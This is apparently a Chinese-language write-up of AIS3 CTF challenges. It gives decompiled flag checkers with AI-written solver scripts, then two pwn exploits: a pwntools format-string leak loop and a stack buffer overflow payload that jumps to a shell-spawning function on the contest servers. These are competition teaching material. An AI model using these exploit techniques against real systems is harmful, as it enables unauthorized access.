使用搜尋功能找flag可以看到sub_2110有出現過這個詞 CleanShot 2025-05-31 at 15.21.36@2x

看起來上面的sub_1E20在做flag檢查, 追進去看:

1
_BOOL4 __cdecl sub_1E20(int a1)
2
{
3
  v1 = 0;
4
  v2 = 51;
5
  v9 = 20;
6
  v3 = 114;
7
  v8[0] = 1480073267;
8
  v8[1] = 1197221906;
9
  v8[2] = 254628393;
10
  v8[3] = 920154;
11
  v8[4] = 1343445007;
12
  v8[5] = 874076697;
13
  v8[6] = 1127428440;
14
  v8[7] = 1510228243;
15
  v8[8] = 743978009;
16
  v8[9] = 54940467;
17
  v8[10] = 1246382110;
18
  qmemcpy(v7, "rikki_l0v3", sizeof(v7));
19
  while ( 1 )
20
  {
21
    *((_BYTE *)v8 + v1++) = v2 ^ v3;
22
    if ( v1 == 45 )
23
      break;
24
    v2 = *((_BYTE *)v8 + v1);
25
    v3 = v7[v1 % 0xA];
26
  }
27
  for ( i = 0; i != 45; ++i )
28
  {
29
    v5 = *(_BYTE *)(a1 + i);
30
    if ( !v5 || v5 != *((_BYTE *)v8 + i) )
31
      return 0;
32
  }
33
  return *(_BYTE *)(a1 + 45) == 0;
34
}

然後就叫Gemini寫個code算出flag:

1
import struct
2

3
def calculate_target_string_bytes():
4
    v8_ints = [
5
        1480073267, 1197221906, 254628393, 920154, 1343445007,
6
        874076697, 1127428440, 1510228243, 743978009, 54940467,
7
        1246382110
8
    ]
9

10
    v8_buffer = bytearray(45)
11

12
    current_offset = 0
13
    for val in v8_ints:
14
        packed_bytes = struct.pack('<i', val)
15
        for i in range(len(packed_bytes)):
16
            if current_offset < 44: # 只填滿由 v8_ints 提供的 44 bytes
17
                v8_buffer[current_offset] = packed_bytes[i]
18
                current_offset += 1
19
            else:
20
                break
21
    key_v7 = b"rikki_l0v3"
22
    c_v1 = 0
23
    c_v2 = 51
24
    c_v3 = 114
25

26
    while True:
27
        xor_result = (c_v2 ^ c_v3) & 0xFF
28
        v8_buffer[c_v1] = xor_result
29
        c_v1 += 1
30

31
        # if ( v1 == 45 ) break;
32
        if c_v1 == 45:
33
            break
34

35
        # v2 = *((_BYTE *)v8 + v1);
36
        c_v2 = v8_buffer[c_v1]
37

38
        # v3 = v7[v1 % 0xA];
39
        c_v3 = key_v7[c_v1 % 10] # 10 是 0xA
40

41
    return bytes(v8_buffer)
42

43
if __name__ == "__main__":
44
    target_bytes = calculate_target_string_bytes()
45

46
    print(f"計算出的目標位元組序列 (長度: {len(target_bytes)} bytes):")
47
    print(f"  Hex: {target_bytes.hex()}")
48
    print(f"  Bytes literal: {target_bytes}")
49

50
    try:
51
        decoded_string = target_bytes.decode('utf-8')
52
        print(f"  UTF-8 解碼: \"{decoded_string}\"")
53
    except UnicodeDecodeError:
54
        try:
55
            decoded_string = target_bytes.decode('latin-1')
56
            print(f"  Latin-1 解碼: \"{decoded_string}\"")
57
        except UnicodeDecodeError:
58
            print("  無法使用 UTF-8 或 Latin-1 解碼為可讀字串。")

Flag{w0w_a_f1ag_check3r_1n_serv3r_1s_c00l!!!}

web flag checker#

題目是一個網站, 裡面有一個輸入框和submit按鈕可以送flag, 並檢查flag有沒有錯

透過check source可以看到裡面有個js檔案, 看得出來應該有用什麼WebAssembly之類的東西

開network看還有匯入個index.wasm檔案: CleanShot 2025-05-31 at 16.18.03@2x

使用wasm-decompile就可以反編譯, 直接找到關鍵點:

1
export function flagchecker(a:int):int { // func9
2
  var b:int = g_a;
3
  var c:int = 96;
4
  var d:int = b - c;
5
  g_a = d;
6
  d[22]:int = a;
7
  var e:int = -39934163;
8
  d[21]:int = e;
9
  var f:int = 64;
10
  var g:long_ptr = d + f;
11
  var h:long = 0L;
12
  g[0] = h;
13
  var i:int = 56;
14
  var j:long_ptr = d + i;
15
  j[0] = h;
16
  var k:int = 48;
17
  var l:long_ptr = d + k;
18
  l[0] = h;
19
  d[5]:long = h;
20
  d[4]:long = h;
21
  var m:long = 7577352992956835434L;
22
  d[4]:long = m;
23
  var n:long = 7148661717033493303L;
24
  d[5]:long = n;
25
  var o:long = -7081446828746089091L;
26
  d[6]:long = o;
27
  var p:long = -7479441386887439825L;
28
  d[7]:long = p;
29
  var q:long = 8046961146294847270L;
30
  d[8]:long = q;
31
  var r:int = d[22]:int;
32
  var s:int = 0;
33
  var t:int = r != s;
34
  var u:int = 1;
35
  var v:int = t & u;
36
  if (eqz(v)) goto B_c;
37
  var w:int = d[22]:int;
38
  var x:int = f_n(w);
39
  var y:int = 40;
40
  var z:int = x != y;
41
  var aa:int = 1;
42
  var ba:int = z & aa;
43
  if (eqz(ba)) goto B_b;
44
  label B_c:
45
  var ca:int = 0;
46
  d[23]:int = ca;
47
  goto B_a;
48
  label B_b:
49
  var da:int = d[22]:int;
50
  d[7]:int = da;
51
  var ea:int = 0;
52
  d[6]:int = ea;
53
  loop L_e {
54
    var fa:int = d[6]:int;
55
    var ga:int = 5;
56
    var ha:int = fa < ga;
57
    var ia:int = 1;
58
    var ja:int = ha & ia;
59
    if (eqz(ja)) goto B_d;
60
    var ka:int = d[7]:int;
61
    var la:int = d[6]:int;
62
    var ma:int = 3;
63
    var na:int = la << ma;
64
    var oa:long_ptr = ka + na;
65
    var pa:long = oa[0];
66
    d[2]:long = pa;
67
    var qa:int = d[6]:int;
68
    var ra:int = 6;
69
    var sa:int = qa * ra;
70
    var ta:int = -39934163;
71
    var ua:int = ta >> sa;
72
    var va:int = 63;
73
    var wa:int = ua & va;
74
    d[3]:int = wa;
75
    var xa:long = d[2]:long;
76
    var ya:int = d[3]:int;
77
    var za:long = f_i(xa, ya);
78
    var ab:int = d[6]:int;
79
    var bb:int = 32;
80
    var cb:int = d + bb;
81
    var db:int = cb;
82
    var eb:int = 3;
83
    var fb:int = ab << eb;
84
    var gb:long_ptr = db + fb;
85
    var hb:long = gb[0];
86
    var ib:int = za != hb;
87
    var jb:int = 1;
88
    var kb:int = ib & jb;
89
    if (eqz(kb)) goto B_f;
90
    var lb:int = 0;
91
    d[23]:int = lb;
92
    goto B_a;
93
    label B_f:
94
    var mb:int = d[6]:int;
95
    var nb:int = 1;
96
    var ob:int = mb + nb;
97
    d[6]:int = ob;
98
    continue L_e;
99
  }
100
  label B_d:
101
  var pb:int = 1;
102
  d[23]:int = pb;
103
  label B_a:
104
  var qb:int = d[23]:int;
105
  var rb:int = 96;
106
  var sb:int = d + rb;
107
  g_a = sb;
108
  return qb;
109
}

同樣丟給AI解XD

1
from struct import pack, unpack
2

3
def rol64(val, r):
4
    return ((val << r) & ((1 << 64) - 1)) | (val >> (64 - r))
5

6
# 目標常數 (以無號 64-bit 表示)
7
consts = [
8
    0x6a66ef8a662a2869,
9
    0x372337d7f4253563,
10
    0x7dddc5dca0a5b99d,
11
    0x2f1a38b8afaf3398,
12
    0x26474626878cac6f
13
]
14

15
shifts = [45, 28, 42, 39, 61]
16

17
parts = [rol64(c, 64 - r) for c, r in zip(consts, shifts)]
18
flag_bytes = b''.join(pack('<Q', p) for p in parts)
19
print(flag_bytes.decode())

Flag: AIS3{W4SM_R3v3rsing_w17h_g0_4pp_39229dd}

Pwn#

Format Number#

chal:

1
#include <stdio.h>
2
#include <fcntl.h>
3
#include <stdlib.h>
4
#include <time.h>
5
#include <ctype.h>
6
#include <string.h>
7

8

9
void check_format(char *format) {
10
    for (int i = 0; format[i] != '\0'; i++) {
11
        char c = format[i];
12
        if (c == '\n') {
13
            format[i] = '\0';
14
            return;
15
        }
16
        if (!isdigit(c) && !ispunct(c)) {
17
            printf("Error format !\n");
18
            exit(1);
19
        }
20
    }
21
}
22

23
int main() {
24
    setvbuf(stdin, 0, 2, 0);
25
    setvbuf(stdout, 0, 2, 0);
26

27
    srand(time(NULL));
28
    int number = rand();
29
    int fd = open("/home/chal/flag.txt", O_RDONLY);
30
    char flag[0x100] = {0};
31
    read(fd, flag, 0xff);
32
    close(fd);
33

34
    char format[0x10] = {0};
35
    printf("What format do you want ? ");
36
    read(0, format, 0xf);
37
    check_format(format);
38

39
    char buffer[0x20] = {0};
40
    strcpy(buffer, "Format number : %3$");
41
    strcat(buffer, format);
42
    strcat(buffer, "d\n");
43
    printf(buffer, "Welcome", "~~~", number);
44

45
    return 0;
46
}

英文字母用不了, 但printf格式時會自動加上d, 就能用%k$d的方式讀stack的資料

然後要用_來串接, 不然會被視為同一個conversion

exploit:

1
from pwn import *
2
import re
3

4
flag = ""
5
for i in range(0, 60):
6
    p = remote("chals1.ais3.org", 50960)
7
    p.recvuntil(b"What format do you want ? ")
8
    p.sendline(f"_%{i}$".encode())
9
    resp = p.recvall().decode()
10
    log.info(resp)
11
    p.close()
12

13
    match = re.search(r"Format number : %_(-?\d+)\n", resp)
14
    if match:
15
        val = int(match.group(1))
16
        if 0 <= val <= 255:
17
            flag += chr(val)
18
            log.info(flag)
19
            if chr(val) == '}':
20
                break

Flag: AIS3{S1d3_ch@nn3l_0n_fOrM47_strln&_!!!}

Welcome to the World of Ave Mujica🌙#

chal:

1
int __fastcall main(int argc, const char **argv, const char **envp)
2
{
3
  _BYTE buf[143]; // [rsp+0h] [rbp-A0h] BYREF
4
  char s[8]; // [rsp+8Fh] [rbp-11h] BYREF
5
  unsigned __int8 int8; // [rsp+97h] [rbp-9h]
6
  char *v7; // [rsp+98h] [rbp-8h]
7

8
  setvbuf(stdin, 0, 2, 0);
9
  setvbuf(_bss_start, 0, 2, 0);
10
  printf("\x1B[2J\x1B[1;1H");
11
  printf("\x1B[31m");
12
  printf("%s", (const char *)banner);
13
  puts(&byte_402A78);
14
  puts(&byte_402AB8);
15
  fgets(s, 8, stdin);
16
  v7 = strchr(s, 10);
17
  if ( v7 )
18
    *v7 = 0;
19
  if ( strcmp(s, "yes") )
20
  {
21
    puts(&byte_402AE8);
22
    exit(1);
23
  }
24
  printf(&byte_402B20);
25
  int8 = read_int8();
26
  printf(&byte_402B41);
27
  read(0, buf, int8);
28
  return 0;
29
}
30

31
int Welcome_to_the_world_of_Ave_Mujica()
32
{
33
  puts(&s);
34
  puts(&byte_402990);
35
  puts(&byte_4029B4);
36
  puts(&byte_4029C3);
37
  puts(&byte_4029D2);
38
  puts(&byte_4029E1);
39
  puts(&byte_4029FC);
40
  puts(&byte_402A15);
41
  return execve("/bin/sh", 0, 0);
42
}
43

44
__int64 read_int8()
45
{
46
  char buf[4]; // [rsp+8h] [rbp-8h] BYREF
47
  int v2; // [rsp+Ch] [rbp-4h]
48

49
  read(0, buf, 4u);
50
  v2 = atoi(buf);
51
  if ( v2 > 127 )
52
  {
53
    puts(&byte_402A38);
54
    exit(1);
55
  }
56
  return (unsigned int)v2;
57
}

前面read_int8()輸入-1，讓他變255，這樣就可以讓輸入長度大於buf大小造成buffer overflow

padding長度就算buf的位置([rbp-A0h])再加上saved rbp

return address算Welcome_to_the_world_of_Ave_Mujica的address再跳過endbr64

exploit:

1
from pwn import *
2
r = remote('chals1.ais3.org', 60179)
3
r.sendlineafter(b'?',b'yes')
4
r.sendlineafter(b':',b'-1')
5
r.sendline(b"a"*0xa8 + p64(0x40125a))
6
r.interactive()

Flag: AIS3{Ave Mujica🎭將奇蹟帶入日常中🛐(Fortuna💵💵💵)…Ave Mujica🎭為你獻上慈悲憐憫✝️(Lacrima😭🥲💦)…_b69760dea2dd3acca3b233b295dc7892}

Web#

Login Screen 1#

Tomorin DB#

Misc#

Ramen CTF#

AIS3 Tiny Server - Web / Misc#

Welcome#

Crypto#

Stream#

Hill#

SlowECDSA#

Random RSA#

Rev#

Simple snake game#

AIS3 Tiny Server - Reverse#

web flag checker#

Pwn#

Format Number#

Welcome to the World of Ave Mujica🌙#